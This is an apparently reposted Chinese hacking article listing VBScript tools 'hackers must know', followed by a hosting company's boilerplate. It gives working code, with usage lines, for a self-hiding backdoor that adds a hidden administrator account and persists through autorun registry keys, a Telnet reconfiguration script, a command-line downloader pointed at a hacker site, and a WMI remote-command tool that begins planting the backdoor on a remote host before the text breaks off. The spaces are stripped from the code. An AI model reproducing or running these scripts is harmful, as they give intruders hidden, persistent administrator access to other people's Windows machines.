黑客必须要知道的几个vbs文件代码
作者 佚名
来源 ASP编程
浏览
发布时间 2013-07-09
1.door.vbs ''*************** ''door.vbsby黑嘿黑 ''*************** dimwsh,FA,FSO setfso=CreateObject("Scripting.FileSystemObject") SetFA=FSO.GetFile(WScript.scriptFullName) FA.Attributes=34 setwsh=CreateObject("WScript.Shell") wsh.run"netuserIUSE_SERVERxyhack.91i.net/add",0,true wsh.run"netlocalgroupadministratorsIUSE_SERVER/add",0,true wsh.Regwrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32",""&FA&"" wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue",0,"REG_DWORD" wsh.regwrite"HKEY_LOCAL_MACHINE\Software\Microsoft\CommandProcessor\AutoRun",""&FA&"" wsh.regwrite"HKEY_CURRENT_USER\Software\Microsoft\CommandProcessor\AutoRun",""&FA&"" 功能:添加不死帐号(随cmd启动而启动),在win下彻底隐藏。 使用:直接运行。 2.ntlm.vbs ''*************** ''ntlm.vbsby黑嘿黑 ''*************** dimwsh setwsh=CreateObject("WScript.Shell") wsh.regwrite"HKLM\Software\Microsoft\TelnetServer\1.0\NTLM",WScript.Arguments(0),"REG_DWORD" wsh.regwrite"HKLM\Software\Microsoft\TelnetServer\1.0\TelnetPort",WScript.Arguments(1),"REG_DWORD" 功能:自定义telnet的ntml和端口。 使用:D:\>ntml.vbs1999 3.iget.vbs ''*************************** ''iget.vbsModby黑嘿黑 ''*************************** SetxPost=CreateObject("Microsoft.XMLHTTP") xPost.Open"GET",LCase(WScript.Arguments(0)),0 xPost.Send() SetsGet=CreateObject("ADODB.Stream") sGet.Mode=3 sGet.Type=1 sGet.Open() sGet.Write(xPost.responseBody) sGet.SaveToFileLCase(WScript.Arguments(1)),2 功能:命令行下下载http文件。 使用:D:\>iget.vbshttp://xyhack.91i.net/vbs.rarvbs.rar 4.rcmd.vbs ''*************** ''rcmd.vbsby黑嘿黑 ''*************** onerrorresumenext setoutstreem=wscript.stdout setinstreem=wscript.stdin if(lcase(right(wscript.fullname,11))="wscript.exe")then setobjShell=wscript.createObject("wscript.shell") objShell.Run("cmd.exe/kcscript//nologo"&chr(34)&wscript.scriptfullname&chr(34)) endif ifwscript.arguments.count<3then usage() wscript.echo"Notenoughparameters." wscript.quit endif ipaddress=wscript.arguments(0) username=wscript.arguments(1) password=wscript.arguments(2) usage() outstreem.write"Conneting"&ipaddress&"...." setobjlocator=createobject("wbemscripting.swbemlocator")''20 setobjswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password) objswbemservices.security_.privileges.add23,true objswbemservices.security_.privileges.add18,true objswbemservices.security_.privileges.add7,true objswbemservices.security_.privileges.add11,true iferrornumber<>0then wscript.echo"Error!" callmain() else wscript.echo"OK!" endif callmain() ''*********************************************************** functiondoor() outstreem.write"Creatingtheblankdoor.." setobjinstproc=objswbemservices.get("win32_process") cmddoor="cmd/cechodimwsh,FA,FSO,t>%windir%\system32\svrer.vbs"_ &"&&echosetfso=CreateObject(""Scripting.FileSystemObject"")>>%windir%\system32\svrer.vbs"_ &"&&echoSetFA=FSO.GetFile(WScript.scriptFullName)>>%windir%\syst |
凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢! |
你可能对下面的文章感兴趣
关于黑客必须要知道的几个vbs文件代码的所有评论